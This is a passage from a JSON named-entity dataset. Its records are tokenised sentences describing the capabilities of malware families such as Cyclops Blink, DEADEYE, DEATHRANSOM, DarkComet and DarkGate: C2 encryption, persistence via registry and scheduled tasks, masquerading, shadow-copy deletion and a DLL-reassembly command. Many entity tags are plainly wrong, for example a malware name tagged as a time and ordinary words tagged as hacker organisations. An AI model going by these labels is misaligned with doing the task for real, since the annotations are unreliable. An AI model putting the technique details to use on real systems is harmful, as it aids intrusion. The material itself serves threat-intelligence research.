"O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "encrypt", "C2", "messages", "with", "AES-256-CBC", "sent", "underneath", "TLS.", "OpenSSL", "library", "functions", "are", "also", "used", "to", "encrypt", "each", "message", "using", "a", "randomly", "generated", "key", "and", "IV,", "which", "are", "then", "encrypted", "using", "a", "hard-coded", "RSA", "public", "key." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "has", "maintained", "persistence", "by", "patching", "legitimate", "device", "firmware", "when", "it", "is", "downloaded,", "including", "that", "of", "WatchGuard", "devices." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Cyclops", "Blink", "can", "upload", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "decrypt", "and", "parse", "instructions", "sent", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "modify", "the", "Linux", "iptables", "firewall", "to", "enable", "C2", "communication", "on", "network", "devices", "via", "a", "stored", "list", "of", "port", "numbers." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "has", "the", "ability", "to", "upload", "exfiltrated", "files", "to", "a", "C2", "server." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "use", "the", "Linux", "API", "`statvfs`", "to", "enumerate", "the", "current", "working", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "has", "the", "ability", "to", "download", "files", "to", "target", "systems." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "has", "the", "ability", "to", "create", "a", "pipe", "to", "enable", "inter-process", "communication." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "rename", "its", "running", "process", "to", "<code>[kworker:0/1]</code>", "to", "masquerade", "as", "a", "Linux", "kernel", "thread.", "Cyclops", "Blink", "has", "also", "named", "RC", "scripts", "used", "for", "persistence", "after", "WatchGuard", "artifacts." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "has", "used", "Tor", "nodes", "for", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "use", "various", "Linux", "API", "functions", "including", "those", "for", "execution", "and", "discovery." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "Cyclops", "Blink", "can", "use", "a", "custom", "binary", "scheme", "to", "encode", "messages", "with", "specific", "commands", "and", "parameters", "to", "be", "executed." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "use", "non-standard", "ports", "for", "C2", "not", "typically", "associated", "with", "HTTP", "or", "HTTPS", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "enumerate", "the", "process", "it", "is", "currently", "running", "under." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "use", "DNS", "over", "HTTPS", "(DoH)", "to", "resolve", "C2", "nodes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "has", "the", "ability", "to", "execute", "on", "device", "startup,", "using", "a", "modified", "RC", "script", "named", "S51armled." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Cyclops", "Blink", "has", "the", "ability", "to", "query", "device", "information." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "use", "the", "Linux", "API", "`if_nameindex`", "to", "gather", "network", "interface", "names." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Cyclops", "Blink", "has", "the", "ability", "to", "use", "the", "Linux", "API", "function", "`utime`", "to", "change", "the", "timestamps", "of", "modified", "firmware", "update", "images." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Cyclops", "Blink", "can", "download", "files", "via", "HTTP", "and", "HTTPS." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "DCSrv", "has", "encrypted", "drives", "using", "the", "core", "encryption", "mechanism", "from", "DiskCryptor." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DCSrv's", "configuration", "is", "encrypted." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "DCSrv", "has", "masqueraded", "its", "service", "as", "a", "legitimate", "svchost.exe", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "DCSrv", "has", "created", "Registry", "keys", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DCSrv", "has", "used", "various", "Windows", "API", "functions,", "including", "`DeviceIoControl`,", "as", "part", "of", "its", "encryption", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DCSrv", "has", "a", "function", "to", "sleep", "for", "two", "hours", "before", "rebooting", "the", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DCSrv", "can", "compare", "the", "current", "time", "on", "an", "infected", "host", "with", "a", "configuration", "value", "to", "determine", "when", "to", "start", "the", "encryption", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DCSrv", "has", "created", "new", "services", "for", "persistence", "by", "modifying", "the", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "DDKONG", "decodes", "an", "embedded", "configuration", "using", "XOR." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DDKONG", "lists", "files", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DDKONG", "downloads", "and", "uploads", "files", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DDKONG", "uses", "Rundll32", "to", "ensure", "only", "a", "single", "instance", "of", "itself", "is", "running", "at", "once." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "has", "the", "ability", "to", "combine", "multiple", "sections", "of", "a", "binary", "which", "were", "broken", "up", "to", "evade", "detection", "into", "a", "single", ".dll", "prior", "to", "execution." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "The", "DEADEYE.EMBED", "variant", "of", "DEADEYE", "has", "the", "ability", "to", "embed", "payloads", "inside", "of", "a", "compiled", "binary." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "has", "encrypted", "its", "payload." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "can", "ensure", "it", "executes", "only", "on", "intended", "systems", "by", "identifying", "the", "victim's", "volume", "serial", "number,", "hostname,", "and/or", "DNS", "domain." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "has", "used", "`schtasks", "/change`", "to", "modify", "scheduled", "tasks", "including", "`\\Microsoft\\Windows\\PLA\\Server", "Manager", "Performance", "Monitor`,", "`\\Microsoft\\Windows\\Ras\\ManagerMobility,", "\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", "and", "`\\Microsoft\\Windows\\WDI\\USOShared`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "can", "use", "`msiexec.exe`", "for", "execution", "of", "malicious", "DLL." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "DEADEYE.EMBED", "variant", "of", "DEADEYE", "can", "embed", "its", "payload", "in", "an", "alternate", "data", "stream", "of", "a", "local", "file." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "can", "execute", "the", "`GetComputerNameA`", "and", "`GetComputerNameExA`", "WinAPI", "functions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "DEADEYE", "can", "use", "`rundll32.exe`", "for", "execution", "of", "living", "off", "the", "land", "binaries", "(lolbin)", "such", "as", "`SHELL32.DLL`." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "DEADEYE", "has", "used", "the", "scheduled", "tasks", "`\\Microsoft\\Windows\\PLA\\Server", "Manager", "Performance", "Monitor`,", "`\\Microsoft\\Windows\\Ras\\ManagerMobility`,", "`\\Microsoft\\Windows\\WDI\\SrvSetupResults`,", "and", "`\\Microsoft\\Windows\\WDI\\USOShared`", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "can", "enumerate", "a", "victim", "computer's", "volume", "serial", "number", "and", "host", "name." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "can", "discover", "the", "DNS", "domain", "name", "of", "a", "targeted", "system." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEADEYE", "can", "run", "`cmd", "/c", "copy", "/y", "/b", "C:\\Users\\public\\syslog_6-*.dat", "C:\\Users\\public\\syslog.dll`", "to", "combine", "separated", "sections", "of", "code", "into", "a", "single", "DLL", "prior", "to", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEATHRANSOM", "can", "use", "public", "and", "private", "key", "pair", "encryption", "to", "encrypt", "files", "for", "ransom", "payment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-OffAct", "O" ] }, { "tokens": [ "DEATHRANSOM", "can", "use", "loop", "operations", "to", "enumerate", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "B-Features", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "DEATHRANSOM", "can", "download", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DEATHRANSOM", "can", "delete", "volume", "shadow", "copies", "on", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DEATHRANSOM", "has", "the", "ability", "to", "use", "loop", "operations", "to", "enumerate", "network", "resources." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-OffAct", "O", "O", "O", "B-Features" ] }, { "tokens": [ "DEATHRANSOM", "can", "enumerate", "logical", "drives", "on", "a", "target", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "versions", "of", "DEATHRANSOM", "have", "performed", "language", "ID", "and", "keyboard", "layout", "checks;", "if", "either", "of", "these", "matched", "Russian,", "Kazakh,", "Belarusian,", "Ukrainian", "or", "Tatar", "DEATHRANSOM", "would", "exit." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Area", "B-Area", "B-Area", "B-Area", "O", "B-Area", "B-HackOrg", "O", "O" ] }, { "tokens": [ "DEATHRANSOM", "can", "use", "HTTPS", "to", "download", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "DEATHRANSOM", "has", "the", "ability", "to", "use", "WMI", "to", "delete", "volume", "shadow", "copies." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "B-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "DOGCALL", "can", "capture", "microphone", "data", "from", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DOGCALL", "is", "capable", "of", "leveraging", "cloud", "storage", "APIs", "such", "as", "Cloud,", "Box,", "Dropbox,", "and", "Yandex", "for", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "B-Tool", "B-Tool", "B-Way", "O", "B-Way", "O", "O" ] }, { "tokens": [ "DOGCALL", "is", "encrypted", "using", "single-byte", "XOR." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "DOGCALL", "can", "download", "and", "execute", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "DOGCALL", "is", "capable", "of", "logging", "keystrokes." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "DOGCALL", "is", "capable", "of", "capturing", "screenshots", "of", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "collect", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "use", "`IsDebuggerPresent`", "to", "detect", "whether", "a", "debugger", "is", "present", "on", "a", "victim." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "deploy", "additional", "tools", "onto", "an", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "has", "been", "named", "`Flash.exe`,", "and", "its", "dropper", "has", "been", "named", "`IExplorer`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "use", "various", "API", "calls", "to", "see", "if", "it", "is", "running", "in", "a", "sandbox." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "be", "partly", "encrypted", "with", "XOR." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "enumerate", "and", "examine", "running", "processes", "to", "determine", "if", "a", "debugger", "is", "present." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "search", "for", "other", "machines", "connected", "to", "compromised", "host", "and", "attempt", "to", "map", "the", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus's", "dropper", "can", "be", "packed", "with", "UPX." ], "ner_tags": [ "B-Idus", "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DRATzarus", "can", "obtain", "a", "list", "of", "users", "from", "an", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "use", "the", "`GetTickCount`", "and", "`GetSystemTimeAsFileTime`", "API", "calls", "to", "inspect", "system", "time." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "use", "the", "`GetTickCount`", "and", "`GetSystemTimeAsFileTime`", "API", "calls", "to", "measure", "function", "timing.", "DRATzarus", "can", "also", "remotely", "shut", "down", "into", "sleep", "mode", "under", "specific", "conditions", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DRATzarus", "can", "use", "HTTP", "or", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Dacls", "can", "encrypt", "its", "configuration", "file", "with", "AES", "CBC." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Dacls", "can", "scan", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Dacls", "has", "had", "its", "payload", "named", "with", "a", "dot", "prefix", "to", "make", "it", "hidden", "from", "view", "in", "the", "Finder", "application." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dacls", "can", "download", "its", "payload", "from", "a", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dacls", "can", "establish", "persistence", "via", "a", "LaunchAgent." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Dacls", "can", "establish", "persistence", "via", "a", "Launch", "Daemon." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Tool", "B-Way" ] }, { "tokens": [ "The", "Dacls", "Mach-O", "binary", "has", "been", "disguised", "as", "a", ".nib", "file." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Dacls", "can", "collect", "data", "on", "running", "and", "parent", "processes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Dacls", "can", "use", "HTTPS", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "DanBot", "can", "use", "use", "IPv4", "A", "records", "and", "IPv6", "AAAA", "DNS", "records", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DanBot", "can", "upload", "files", "from", "compromised", "hosts." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "DanBot", "can", "use", "a", "VBA", "macro", "to", "decode", "its", "payload", "prior", "to", "installation", "and", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DanBot", "can", "Base64", "encode", "its", "payload." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "DanBot", "can", "delete", "its", "configuration", "file", "after", "installation." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "DanBot", "can", "download", "additional", "files", "to", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "DanBot", "has", "relied", "on", "victims'", "opening", "a", "malicious", "file", "for", "initial", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "DanBot", "files", "have", "been", "named", "`UltraVNC.exe`", "and", "`WINVNC.exe`", "to", "appear", "as", "legitimate", "VNC", "tools." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DanBot", "can", "use", "a", "scheduled", "task", "for", "installation." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DanBot", "has", "been", "distributed", "within", "a", "malicious", "Excel", "attachment", "via", "spearphishing", "emails." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "B-Way", "O" ] }, { "tokens": [ "DanBot", "can", "use", "VNC", "for", "remote", "access", "to", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DanBot", "can", "use", "a", "VBA", "macro", "embedded", "in", "an", "Excel", "file", "to", "drop", "the", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "B-Way", "I-Way", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "DanBot", "can", "use", "HTTP", "in", "C2", "communication." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "DanBot", "has", "the", "ability", "to", "execute", "arbitrary", "commands", "via", "`cmd.exe`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-SamFile" ] }, { "tokens": [ "DarkComet", "can", "listen", "in", "to", "victims'", "conversations", "through", "the", "system’s", "microphone." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "can", "steal", "data", "from", "the", "clipboard." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "can", "execute", "various", "types", "of", "scripts", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "can", "disable", "Security", "Center", "functions", "like", "the", "Windows", "Firewall." ], "ner_tags": [ "B-Way", "O", "B-Org", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "DarkComet", "can", "disable", "Security", "Center", "functions", "like", "anti-virus." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DarkComet", "can", "load", "any", "files", "onto", "the", "infected", "machine", "to", "execute." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "has", "a", "keylogging", "capability." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "has", "dropped", "itself", "onto", "victim", "machines", "with", "file", "names", "such", "as", "WinDefender.Exe", "and", "winupdate.exe", "in", "an", "apparent", "attempt", "to", "masquerade", "as", "a", "legitimate", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "adds", "a", "Registry", "value", "for", "its", "installation", "routine", "to", "the", "Registry", "Key", "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "Enable", "LUA=”0”</code>", "and", "<code>HKEY_CURRENT_USER\\Software\\DC3_FEXEC</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "DarkComet", "can", "list", "active", "processes", "running", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "adds", "several", "Registry", "entries", "to", "enable", "automatic", "execution", "at", "every", "system", "startup." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "can", "open", "an", "active", "screen", "of", "the", "victim’s", "machine", "and", "take", "control", "of", "the", "mouse", "and", "keyboard." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "has", "the", "option", "to", "compress", "its", "payload", "using", "UPX", "or", "MPRESS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "DarkComet", "can", "collect", "the", "computer", "name,", "RAM", "used,", "and", "operating", "system", "version", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "gathers", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "can", "access", "the", "victim’s", "webcam", "to", "take", "pictures." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "can", "use", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "DarkComet", "can", "launch", "a", "remote", "shell", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "DarkGate", "elevates", "accounts", "created", "through", "the", "malware", "to", "the", "local", "administration", "group", "during", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O", "O" ] }, { "tokens": [ "DarkGate", "will", "search", "for", "cryptocurrency", "wallets", "by", "examining", "application", "window", "names", "for", "specific", "strings.", "DarkGate", "extracts", "information", "collected", "via", "NirSoft", "tools", "from", "the", "hosting", "process's", "memory", "by", "first", "identifying", "the", "window", "through", "the", "<code>FindWindow</code>", "API", "function." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", 